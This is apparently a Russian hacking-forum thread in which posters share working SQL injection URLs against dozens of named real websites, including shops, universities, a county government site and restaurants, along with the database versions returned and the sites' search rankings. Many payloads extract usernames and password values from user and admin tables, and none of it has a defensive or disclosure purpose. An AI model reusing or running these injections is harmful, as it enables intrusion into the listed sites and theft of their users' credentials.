SQL Инъекции

moscow.yustas-shop.ru

PHP:

http://www.moscow.yustas-shop.ru/article.php?id=-10732+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14,15,16,17,18--+

5.0.51a-24+lenny5
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 2
------------------------------------------------------------------------------------
mama1000.ru

PHP:

http://mama1000.ru/article.php?id=-10731+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14,15,16,17,18--+

5.0.51a-24+lenny5
Яндекс тИЦ (CY) 0
Alexa Rank 11,702,559
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
oilkemi.ru

PHP:

http://oilkemi.ru/price.php?id=-1+union+select+1,version%28%29

5.0.51a-24+lenny5-log
Яндекс тИЦ (CY) 0
Alexa Rank 0
Google PageRank (PR) 0

----------------------------------------------------------------------------------
tmtc.ru

PHP:

http://tmtc.ru/news/detail.php?ID=1339+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.61
Яндекс тИЦ (CY) 30
Alexa Rank 7,410,884 +2,810,424
Google PageRank (PR) 1
-----------------------------------------------------------------------------------
evgeniybolgov.com

PHP:

http://evgeniybolgov.com/view_post.php?id=52%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.58
Яндекс тИЦ (CY) 10
Alexa Rank 1,230,694 +506,395
Google PageRank (PR) 2
-----------------------------------------------------------------------------------
vipdosug24.ru

PHP:

http://vipdosug24.ru/company.php?id=670+and%28select+1+from%28select+count%28*%29,concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+

5.0.90-log
Яндекс тИЦ (CY) 20
Alexa Rank 0
Google PageRank (PR) 2
------------------------------------------------------------------------------------

 

сводки :

Version:

 

IP-телефония : Интернет-телефония : Компьютерная телефония.

ТИЦ == 230, PR == 3, ЯK == true, DMOZ == true;

Вроде слепая. В примере последний символ. Но меня терзают смутные сомнения, что можно раскрутить проще.

PHP:

http://iptop.net/service/ip_telephony.php?log=898'+and+ascii(substring((database()),7,1))=53--+h

 

http://wigstyle.ru/docs/sovet/index.php?id=5'+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9+LIMIT+1,1/*


http://nice-media.ru/browse_new.php?cat=18+order+by+1--

 

http://iptop.net/service/ip_telephony.php?log=-898'+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+

 

Вот-вот, чутье меня не подвело, где-то и почему-то я с group by жёстко обманулся, лол.

Набережночелнинский филиал Нижегородского государственного лингвистического университета им.Н.А. Добролюбова.

ТИЦ == 30, PR ==2;

PHP:

http://nfnglu.ru/?code=111111111+union+select+1,2,concat_ws(0x03a,host,user,password),4,5,6,7,8+from+mysql.user--

 

ombu.primorsky.ru

PHP:

http://ombu.primorsky.ru/articles.php?id=-590+union+select+1,2,3,4,version%28%29,6,7--+

4.1.22-log
Яндекс тИЦ (CY) 80
Alexa Rank 0
Google PageRank (PR) 5
------------------------------------------------------------------------------------

free-games-online.com.ua

PHP:

http://free-games-online.com.ua/view_game.php?id=2259%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

5.1.63-cll
Яндекс тИЦ (CY) 10
Alexa Rank 3,479,478 -5,288,381
Google PageRank (PR) 1
------------------------------------------------------------------------------------
chov.net

PHP:

http://www.chov.net/gene/1000/genealogie.php?gPage=1&gSearch=&gCmku=1&gNameT=1&gName=cool&gAct=detail&ID=15938+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

4.1.20
Яндекс тИЦ (CY) 10
Alexa Rank 12,755,816 +7,338,930
Google PageRank (PR) 2
-----------------------------------------------------------------------------------

 

PR == 3;

PHP:

http://www.flevotrack.nl/index.php?file=news.php&news_ID=-125+union+select+1,concat_ws(0x03a,username,user_password),3,4,5+from+forum_users+limit+1,1--

 

PR=2

[email protected]

 

PR 7

Code:

http://www.iucf.indiana.[B][COLOR=Lime][SIZE=3]edu[/SIZE][/COLOR][/B]/events/seminars.php?group=-np')+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,10--+

Database Version: 5.0.18-nt-log
Database name: iucf_web
User name: [email protected]

 

Такие дела.

ТИц == 20, PR == 6, DMOZ == Government;

PHP:

http://www.pima.gov/navigate.aspx?L1=5+or+1=@@version--

 

Футбольный клуб "Химки":

 

Для любителей пинболла.

http://www.ozpinball.com/classified.php?id=-346+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,115,16,17,18,19,20,21,22,23,24,25,26,27,28+--+

Музыкальный каталог.Скуля выявлена по ошибке:DataBase Error!!!

http://blog4rock.com/album.php?id=-104404+union%0Aselect+1,version(),3,4,5,6,7+--+

В качестве ошибки выводится запятая (,)
http://www.sheltoweeart.com/member-detail.php?ID=-52+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

Выводится в ошибке
http://www.freezinforareason.com/members/member.php?mem_id=-746+union+select+1,concat_ws(0x3a,email,password),3,4+from+members+--+

 

ТИЦ == 10, PR == 6; AR == 132,924

PHP:

http://www.africa.com/print?type=city&url=-777777777'+union+select+1,database(),3,4,5,6,7,8,9--+h

 

Code:

[COLOR=DarkOrange][B]http://www.soa.ca/member_details.php?id=-60'+/*!UNiON*/+/*!SELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,version(),49,50,51,52,53,54,55,56,57,58,59,60,61,62,63+--+

http://www.berettaspeed.com/members/view.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

http://www.cwilmington.com/member_detail.php?id=-226+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,username,password),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+cw_member+--+

http://www.gardendesigngroup.ca/member_display.php?id=-8+union+select+1,version(),3,4,5,6,7,8,9,10,11+--+

http://www.helmetgames.com/memberPanel.php?ID=-98+/*!UNiON*/+/*!SELECt*/+version(),2,3,4,5,6,7,8,9,10,11,12+--+
[/B][/COLOR]

 

Create a Countdown Clock Widget for Your Website.

PR == 4;

PHP:

http://countingdownto.com/countdown/ololo+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--

 

ядро:
ТИЦ 475!

банерхост:
ТИЦ 50

 

Code:

[COLOR=DarkOrange][B]http://www.northalsted.com/pages/member/47.php?id=-409'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+

http://www.steelexpo.ru/print_base.php?id=-6801+union+select+version(),2,3,4+--+

http://www.baseworld.com/stores.php?id=-1'+/*!UNiON*/+/*!SELECt*/+1,version(),3,4,5,6,7,8,9,10+--+

http://hardware.org.ru/faq/answ.php?id=-9493'+union+select+1,2,3,version(),5,6,7,8,9,10+--+

http://www.ramadaplazadoha.com/food_drink/logodetails.php?id=-18+union+select+1,2,3,4,5,concat_ws(0x3a,user_id,user_pass),7,8+from+admin_user+--+

http://www.foodandvine.com/news_article.php&id=-18+union+select+1,concat_ws(0x3a,userid,passwd),3,4,5,6,7,8+from+Users--+

http://goodfoodla.org/calendar_readmore.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10+--+

http://www.boyersfood.com/party-trays.php?ID=-8э+union+select+version(),2,3,4,5+--+

[COLOR=Red]Ресторан "Потаскуй" :D [/COLOR]
http://potaskuy.com/01_Food/00_Food.php?k=-3+union+select+1,2,concat_ws(0x3a,login,passwd),4,5,6,7+from+site_login+--+
http://potaskuy.com/01_Food/00_Food.php?k=-3+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7+from+sf_guard_user+--+

http://www.infokontakt.ru/subdomains/pumps/food/pumps.php?id=-15+union+select+version(),2,3+--+

http://www.foodaktuell.ch/editorial.php?id=-177+union+select+1,2,titel,4,5,6,7+from+dbinfo+--+
[/B][/COLOR]

 

Тиц: 700
PR: 7

Code:

http://diglib.lib.utk.[COLOR=Yellow]edu[/COLOR]/rfj/index.php?bid=1&pg=4-999999.9+union+select+version(),2--+g

Смотрим исходник:

Code:

<a href="javascript:display('/rfj/data/200/[COLOR=Green]5.1.61[/COLOR]','4-999999.9 union select version(),2-- g');">

--------------------------------
Тиц: 275
PR: 7

Code:

http://m.ua.[COLOR=Yellow]edu[/COLOR]/d/map/bid_list.php?bID=1'+union+select+1,2,@@version--+f

Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
--------------------------------
Тиц: 950
PR: 9

Code:

http://marine.rutgers.[COLOR=Yellow]edu[/COLOR]/cool/auvs/index.php?did=163-999999.9')union+select+1,2,3,4,version(),6,7,8,9,10,11,12--+f&view=kmz

5.1.52

P.S. Это другие поддомены.
Ппц, на оформление ушло больше вреемени чем на раскрутку

 

Тиц: 1200
PR: 8

Code:

http://lifescience.[COLOR=Olive]arizona.[COLOR=Lime]edu[/COLOR][/COLOR]/programs.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,netid,password),6+from+lifesci_ref.user+limit+3,1--+f&pa=Animal+Sciences

admin.php